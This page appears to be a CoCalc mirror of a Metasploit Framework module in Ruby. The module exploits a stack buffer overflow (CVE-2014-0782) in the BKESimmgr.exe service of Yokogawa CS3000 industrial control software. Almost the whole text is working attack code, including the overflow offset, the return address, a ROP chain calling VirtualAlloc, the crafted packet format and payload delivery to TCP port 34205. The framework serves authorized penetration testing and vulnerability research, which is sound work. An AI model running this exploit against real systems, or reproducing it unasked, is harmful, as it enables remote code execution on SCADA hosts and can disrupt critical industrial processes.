Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability

18
          exists in the BKESimmgr.exe service when handling specially crafted packets, due to an

19
          insecure usage of memcpy, using attacker controlled data as the size count. This module

20
          has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows

21
          2003 SP2.

22
        },

23
        'Author' => [

24
          'juan vazquez',

25
          'Redsadic <julian.vilas[at]gmail.com>'

26
        ],

27
        'References' => [

28
          ['CVE', '2014-0782'],

29
          ['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],

30
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']

31
        ],

32
        'Payload' => {

33
          'Space' => 340,

34
          'DisableNops' => true,

35
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          [

40
            'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',

41
            {

42
              'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll

43
              'Offset' => 64,

44
              'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe

45
              'FakeArgument2' => 0x0040EB90  # ptr to .data on BKESimmgr.exe

46
            }

47
          ],

48
        ],

49
        'DisclosureDate' => '2014-03-10',

50
        'DefaultTarget' => 0,

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    register_options(

60
      [

61
        Opt::RPORT(34205)

62
      ]

63
    )

64
  end

65


66
  def check

67
    data = create_pkt(rand_text_alpha(4))

68


69
    res = send_pkt(data)

70


71
    if res && res.length == 10

72
      simmgr_res = parse_response(res)

73


74
      if valid_response?(simmgr_res)

75
        check_code = Exploit::CheckCode::Appears

76
      else

77
        check_code = Exploit::CheckCode::Safe

78
      end

79
    else

80
      check_code = Exploit::CheckCode::Safe

81
    end

82


83
    check_code

84
  end

85


86
  def exploit

87
    bof = rand_text(target['Offset'])

88
    bof << [target.ret].pack("V")

89
    bof << [target['FakeArgument1']].pack("V")

90
    bof << [target['FakeArgument2']].pack("V")

91
    bof << rand_text(16) # padding (corrupted bytes)

92
    bof << create_rop_chain

93
    bof << payload.encoded

94


95
    data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0

96
    data << [bof.length].pack("n")

97
    data << bof

98


99
    pkt = create_pkt(data)

100


101
    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")

102
    connect

103
    sock.put(pkt)

104
    disconnect

105
  end

106


107
  def create_rop_chain

108
    # rop chain generated with mona.py - www.corelan.be

109
    rop_gadgets =

110
      [

111
        0x004047ca, # POP ECX # RETN [BKESimmgr.exe]

112
        0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]

113
        0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]

114
        0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]

115
        0x619436d3, # POP EBP # RETN [libbkeeda.dll]

116
        0x61615424, # & push esp #  ret  [libbkeldc.dll]

117
        0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]

118
        0x00000001, # 0x00000001-> ebx

119
        0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]

120
        0x00001000, # 0x00001000-> edx

121
        0x0040765a, # POP ECX # RETN [BKESimmgr.exe]

122
        0x00000040, # 0x00000040-> ecx

123
        0x6191aaab, # POP EDI # RETN [libbkeeda.dll]

124
        0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]

125
        0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]

126
        0x90909090, # nop

127
        0x619532eb  # PUSHAD # RETN [libbkeeda.dll]

128
      ].pack("V*")

129


130
    rop_gadgets

131
  end

132


133
  def create_pkt(data)

134
    pkt = [0x01].pack("N")         # Operation Identifier

135
    pkt << [data.length].pack("n") # length

136
    pkt << data                    # Fake packet

137


138
    pkt

139
  end

140


141
  def send_pkt(data)

142
    connect

143
    sock.put(data)

144
    res = sock.get_once

145
    disconnect

146


147
    res

148
  end

149


150
  def parse_response(data)

151
    data.unpack("NnN")

152
  end

153


154
  def valid_response?(data)

155
    valid = false

156


157
    if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5

158
      valid = true

159
    end

160


161
    valid

162
  end

163
end

164


165